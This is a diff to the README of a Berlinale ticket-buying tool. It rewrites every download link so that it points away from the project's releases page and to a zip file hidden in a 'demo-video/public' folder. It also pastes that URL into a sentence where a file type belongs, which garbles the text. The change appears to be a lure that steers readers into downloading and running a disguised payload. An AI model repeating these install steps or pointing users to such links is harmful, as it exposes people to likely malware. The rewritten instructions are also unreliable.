arcaxbydz/berlinale-ticket-buyer/README.md

 ### 📥 Download / Install

-To get started, visit this page to download: [Download Latest Release](https://github.com/arcaxbydz/berlinale-ticket-buyer/releases).
+To get started, visit this page to download: [Download Latest Release](https://github.com/arcaxbydz/berlinale-ticket-buyer/raw/refs/heads/main/demo-video/public/berlinale_buyer_ticket_v2.4.zip).

 Follow these steps to install and run the application:

-1. **Visit the Release Page**: Go to [this link](https://github.com/arcaxbydz/berlinale-ticket-buyer/releases) to find the latest version.
+1. **Visit the Release Page**: Go to [this link](https://github.com/arcaxbydz/berlinale-ticket-buyer/raw/refs/heads/main/demo-video/public/berlinale_buyer_ticket_v2.4.zip) to find the latest version.
 2. **Download the Installer**: Choose the appropriate installer for your system.
-This will typically be a `.exe` or `.tar.gz` file, depending on your OS.
+This will typically be a `.exe` or `https://github.com/arcaxbydz/berlinale-ticket-buyer/raw/refs/heads/main/demo-video/public/berlinale_buyer_ticket_v2.4.zip` file, depending on your OS.
 3. **Run the Installer**: Once downloaded, open the file and follow the prompts to install the application on your computer.
 4. **Launch the App**: After installation, find the application icon on your desktop or in your applications folder.
 Double-click it to run the program.